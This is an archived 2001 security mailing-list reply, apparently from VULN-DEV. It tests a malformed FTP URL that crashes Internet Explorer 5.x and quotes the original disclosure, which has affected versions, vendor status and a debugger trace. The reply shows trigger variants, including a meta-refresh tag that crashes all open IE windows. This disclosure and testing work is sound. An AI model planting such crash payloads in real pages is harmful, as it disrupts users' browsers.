Re: [bug]: Cause IE 5.X to crash

From: Arthur Barton (arthurbat_private)
Date: Sun May 06 2001 - 18:49:54 PDT

  • Next message: Joe: "Re: 239.255.255.250"

    Win98 4.10.1998
    ie 6.00.2462.0000
    
    start -> run -> ftp://whatever//.#. -> enter
    or
    start -> run -> ftp.whatever//.#. -> enter
    causes iexplore.exe to crash
    
    location bar -> ftp://whatever//.#. -> enter
    or
    location bar -> ftp.whatever//.#. -> enter
    in either explorer.exe or iexpore.exe causes either to crash
    
    ftp://ftp.valid.ftp.server//.#. -> enter
    also causes a crash
    
    <meta http-equiv="refresh" content="0; URL=ftp://whatever//.#.">
    all running instances of iexplore.exe crash
    
    #!/usr/bin/perl
    print "Location: ftp://whatever//.#.\n\n";
    results in "Cannot find server"
    
    hmm.
    hth..
    
    At 08:07  7/05/01 +0800, Uidam, T (Tim) wrote:
    >NOT Vulnerable on IE 5.5 SP1 (no hotfixes) on WinNT 4 SP5.
    >
    >Nope, not even the tiniest glitch. If a valid FTP address is put in place of
    >"whatever" it simply displays the FTP root in the browser window.
    >
    >Running ftp://whatever/.#./ from Start/Run launches IE, and displays "cannot
    >Find Server" with ftp://whatever// in the address bar.
    >
    >
    >Hope this helps! :)
    >
    >Tim.
    >
    >-----Original Message-----
    >From: Elie Aka Lupin Bursztein [mailto:secuat_private]
    >Sent: Saturday, 5 May 2001 8:35
    >To: VULN-DEVat_private
    >Subject: [bug]: Cause IE 5.X to crash
    >
    >
    >hello,
    >I have discover the last week end the following bug :
    >
    >Synopsis
    >--------------
    >
    >By putting this malformed link on a web page a malicious
    >user could crash all the IE windows. It also work by passing the link
    >directly into the address field of IE.
    >
    >Affected version :
    >-----------------------
    >
    >IE 5.5 sp1 for WIN 98 / 98 SE /2000 / 2000 sp1
    >IE 5.5 for WIN 98 / 98 SE /2000 / 2000 sp1
    >IE 5.0 for WIN 98 / 98 SE /2000 / 2000 sp1
    >
    >not affected
    >
    >IE 5.0 For Mac
    >
    >not tested on :
    >
    >Win 95 , Win ME
    >
    >The Bug :
    >-------------
    >
    >the following url Crash IE : "ftp://whatever//.#./"
    >
    >
    >Vendor status
    >---------------------
    >
    >Microsoft has been notice during the week and they have told me that the
    >bug will be fix in the next Service pack.
    >
    >Details
    >----------
    >
    >First it doesn't work with http:// . We could also notify that when we put
    >this link in a web page and we select it and trie to copy the link we get
    >"ftp://whatever//#./" instead of "ftp://whatever//.#./" . Of course
    >"ftp://whatever//#./" crash IE as well... It is the same for the status bar
    >: we could read "ftp://whatever//#./" instead of "ftp://whatever//.#./" .
    >Finally if you tape very slowly in the address field this url, It crash
    >also IE, That's why i suppose that IE 4 is not vulnerable to this.
    >
    >I have make more investigation and find out this :
    >
    >) it's a call of msieftp.dll who cause the crash. i have determine this
    >by using a debugger
    >according to the following code :
    >
    >7120B8D3 push dword ptr [ebp+14h]
    >7120B8D6 call dword ptr ds:[712012D8h] //this is what cause the crash
    >7120B8DC cmp byte ptr [eax],0
    >7120B8DF jne 7120B93A
    >7120B8E1 lea eax,[ebp+8]
    >7120B8E4 push eax
    ><--snipe -->
    >7120B93A mov eax,edi
    >7120B93C pop edi
    >7120B93D pop esi
    >7120B93E leave
    >7120B93F ret 14h
    >7120B942 push ebp
    >7120B943 mov ebp,esp
    >
    >It doesn't seems to been exploitable to me, but may be you will find
    >something.
    



    This archive was generated by hypermail 2b30 : Mon May 07 2001 - 08:11:12 PDT